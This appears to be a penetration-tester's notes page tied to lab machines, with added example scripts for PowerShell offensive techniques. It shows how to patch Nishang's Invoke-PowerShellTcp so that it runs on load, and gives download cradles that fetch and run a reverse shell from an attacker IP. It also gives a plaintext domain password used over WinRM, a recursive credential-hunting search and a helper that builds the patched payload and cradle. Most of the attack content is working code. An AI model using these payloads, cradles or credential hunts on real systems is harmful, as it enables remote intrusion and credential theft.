Nishang
To load a Nishang .ps1 (for example Invoke-PowerShellTcp.ps1) onto a Windows machine and have it run as soon as it is loaded, append a call to the function at the very bottom of the file, after the closing brace of the function definition:
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.4 -Port 1234
Then, on the compromised machine, download and evaluate the file in memory with a download cradle (the file is served over HTTP from the attacker box):
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.4/Invoke-PowerShellTcp.ps1')
Examples: [[Anubis#^bcdb9e]]
Invoke-Command
Cmdlet that runs a script block on a remote machine over WinRM (PowerShell Remoting), here with explicit credentials for a domain account:
PS> $Password = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
PS> $Creds = New-Object System.Management.Automation.PSCredential('timelapse.htb\svc_deploy', $Password)
PS> Invoke-Command -ComputerName dc01 -Credential $Creds -ScriptBlock { whoami }
Examples: Fulcrum
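As an added example (not from the page), the same credentials used through a reusable session, with a terminating error on connection or authentication failure and local values passed into the remote script block via `$using:`. The host `dc01`, the account and the paths checked are assumptions taken from or added to the snippet above:

```powershell
# Added example: run checks on a remote host over WinRM with explicit credentials.
# Assumed values: host dc01, account timelapse.htb\svc_deploy (as on this page), paths to list.
function Invoke-RemoteCheck {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [string[]]$Paths = @('C:\Users', 'C:\inetpub')   # assumed directories of interest
    )
    # -ErrorAction Stop: fail loudly on WinRM/auth errors instead of continuing with no session.
    $session = New-PSSession -ComputerName $ComputerName -Credential $Credential -ErrorAction Stop
    try {
        Invoke-Command -Session $session -ScriptBlock {
            # $using: copies the caller's $Paths into the remote runspace (-ArgumentList is the alternative).
            $dirs = foreach ($p in $using:Paths) {
                if (Test-Path $p) { Get-ChildItem -Path $p -Name -ErrorAction SilentlyContinue }
            }
            $id = [Security.Principal.WindowsIdentity]::GetCurrent()
            [pscustomobject]@{
                Host  = $env:COMPUTERNAME
                User  = $id.Name
                Admin = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
                            [Security.Principal.WindowsBuiltInRole]::Administrator)
                Dirs  = $dirs
            }
        }
    } finally {
        # Always tear the session down, even if the remote command throws.
        Remove-PSSession -Session $session
    }
}

$Password = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$Creds    = New-Object System.Management.Automation.PSCredential('timelapse.htb\svc_deploy', $Password)
Invoke-RemoteCheck -ComputerName dc01 -Credential $Creds
```

WinRM listens on 5985 (HTTP) by default; if only the HTTPS listener on 5986 is exposed, add `-UseSSL` and, for a self-signed certificate, `-SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)` to `New-PSSession`.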
Get-SMBShare
Lists the SMB shares of the local machine (the Path column is empty for these rows on the page):
PS C:\Users\BTables\Desktop> Get-SMBShare
Name    ScopeName  Path  Description
----    ---------  ----  -----------
ADMIN$  *                Remote Admin
C$      *                Default share
IPC$    *                Remote IPC
Examples: Fulcrum
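As an added example (not from the page), a report that joins each share with its share-level ACL, so that non-default shares granted to Everyone or Authenticated Users stand out from the ADMIN$/C$/IPC$ noise. It assumes the SmbShare module is available (Windows 8 / Server 2012 and later); on older hosts `net share` is the fallback:

```powershell
# Added example: list every local SMB share with its share-level ACL.
function Get-ShareReport {
    Get-SmbShare | ForEach-Object {
        $share = $_
        # Get-SmbShareAccess needs rights on the share; skip quietly when denied.
        $acl = Get-SmbShareAccess -Name $share.Name -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Name    = $share.Name
            Path    = $share.Path
            # Hidden administrative shares end in '$' (ADMIN$, C$, IPC$, D$ ...).
            Default = $share.Name -match '\$$'
            Access  = ($acl | ForEach-Object {
                          "$($_.AccountName):$($_.AccessRight)($($_.AccessControlType))"
                      }) -join '; '
        }
    }
}

# Non-default shares first, since those are the ones worth reading.
Get-ShareReport | Sort-Object Default, Name | Format-Table -AutoSize -Wrap
```

The share ACL is only half of the story: effective access is the intersection of the share permission and the NTFS ACL on `Path`, so a share granting Everyone Full still yields nothing if the directory ACL denies the user.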
Select-String (Search String Pattern)
Searches file contents for a regex pattern, here every .ps1 under the scripts share, first for the string Administrator and then for the fragment 923a:
PS X:\fulcrum.local\scripts> Select-String -Path "X:\fulcrum.local\scripts\*.ps1" -Pattern Administrator
PS X:\fulcrum.local\scripts> Select-String -Path "X:\fulcrum.local\scripts\*.ps1" -Pattern 923a
Example: Fulcrum
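As an added example (not from the page), the same search turned into a recursive credential hunt: several patterns at once, every file type that commonly embeds secrets, and one line of context on either side of each hit. The root path is the one from the page; the patterns and file extensions are assumptions:

```powershell
# Added example: recursive search for credential-shaped strings in scripts and config files.
# Assumed root: X:\fulcrum.local\scripts (from the page). Patterns are regexes (Select-String default).
function Find-ScriptSecrets {
    param(
        [Parameter(Mandatory)][string]$Root,
        [string[]]$Include = @('*.ps1', '*.bat', '*.cmd', '*.vbs', '*.xml', '*.config', '*.txt')
    )
    # Strings that usually sit next to a secret. Select-String is case-insensitive by default.
    $patterns = @(
        'pass(word|wd)?\s*[=:]',     # password=..., pwd: ...
        'ConvertTo-SecureString',    # inline PSCredential construction
        'PSCredential',
        '-Credential\b',
        'net\s+use\b',               # mapped drives with embedded passwords
        'Administrator'
    )
    Get-ChildItem -Path $Root -Recurse -File -Include $Include -ErrorAction SilentlyContinue |
        Select-String -Pattern $patterns -AllMatches -Context 1, 1 |
        ForEach-Object {
            [pscustomobject]@{
                File    = $_.Path
                Line    = $_.LineNumber
                Pattern = $_.Pattern           # which of the patterns fired
                Text    = $_.Line.Trim()
                Before  = ($_.Context.PreContext -join ' ').Trim()
                After   = ($_.Context.PostContext -join ' ').Trim()
            }
        }
}

Find-ScriptSecrets -Root 'X:\fulcrum.local\scripts' | Format-Table -AutoSize -Wrap
```

`-Pattern` is a regular expression: when hunting for a literal token that contains `$`, `.` or `(` (a leaked password, for instance), pass `-SimpleMatch` so the metacharacters are not interpreted.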
AD CS
TODO [[Anubis]]
Invoke-PowerShellTCP
To get a reverse shell with PowerShell we can use Nishang's Invoke-PowerShellTcp.ps1; all that is needed is to append the call to the function at the very bottom of the .ps1 file, as follows:
# Invoke-PowerShellTCP.ps1
------------------------SNIP---------------------------
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -Port 443 -Rows 37 -Cols 189
To get the rows and columns of our terminal (for the -Rows and -Cols arguments), run stty size on the attacker machine; it prints rows first, then columns.
Then, from the shell we already have on the target, we only need to execute the following PowerShell command:
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1')"
Don't forget to serve the file over HTTP and to start your netcat listener locally on the port chosen in the script (443 here) before running the cradle.
Examples: Streamio [[Anubis]]
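As an added example (not from the page or from Nishang), a helper for the attacker side that does the patching described in this section and in the Nishang section above in one step: it appends the invocation line to a copy of Invoke-PowerShellTcp.ps1, refuses to append twice, derives the terminal size from the current console instead of stty, and returns the cradle to paste on the target. The paths, listener address and the served URL are assumptions; it is meant to be run with pwsh on the attacker box:

```powershell
# Added example: prepare a self-invoking copy of Nishang's Invoke-PowerShellTcp.ps1.
# Assumed: ./Invoke-PowerShellTcp.ps1 is the stock script, the patched copy is served from
# http://<LHost>/ by a web server started separately, and the listener is on <LPort>.
function New-NishangReverseShellPayload {
    param(
        [Parameter(Mandatory)][string]$ScriptPath,   # stock Nishang script
        [Parameter(Mandatory)][string]$OutPath,      # patched copy to serve
        [Parameter(Mandatory)][string]$LHost,        # attacker IP
        [int]$LPort = 443,
        [switch]$WithTerminalSize                    # add -Rows/-Cols (see note below)
    )
    $src = Get-Content -Path $ScriptPath -Raw
    # Idempotence check: a copy that already calls itself would spawn two connections.
    if ($src -match '(?m)^\s*Invoke-PowerShellTcp\s+-Reverse') {
        throw "$ScriptPath already contains an invocation line"
    }
    $call = "Invoke-PowerShellTcp -Reverse -IPAddress $LHost -Port $LPort"
    if ($WithTerminalSize) {
        # Same values 'stty size' prints: rows (Height) then columns (Width).
        $size  = $Host.UI.RawUI.WindowSize
        $call += " -Rows $($size.Height) -Cols $($size.Width)"
    }
    Set-Content -Path $OutPath -Value ($src.TrimEnd() + "`n" + $call + "`n") -NoNewline
    # Cradle for the target; the URL path must match where $OutPath is served from.
    $file = Split-Path -Path $OutPath -Leaf
    return "powershell.exe -nop -ep Bypass -c `"IEX(New-Object Net.WebClient).DownloadString('http://$LHost/$file')`""
}

# Usage (attacker box): writes ./serve/Invoke-PowerShellTcp.ps1 and prints the one-liner to run on the target.
New-NishangReverseShellPayload -ScriptPath ./Invoke-PowerShellTcp.ps1 -OutPath ./serve/Invoke-PowerShellTcp.ps1 `
    -LHost 10.10.16.2 -LPort 443
```

Only pass `-WithTerminalSize` if your copy of the script declares `-Rows` and `-Cols` in its param block; the stock Nishang Invoke-PowerShellTcp.ps1 only accepts `-IPAddress`, `-Port`, `-Reverse` and `-Bind`, and an unknown parameter makes the call fail before any connection is made. Start the HTTP server in `./serve` and `nc -lvnp 443` before running the cradle on the target.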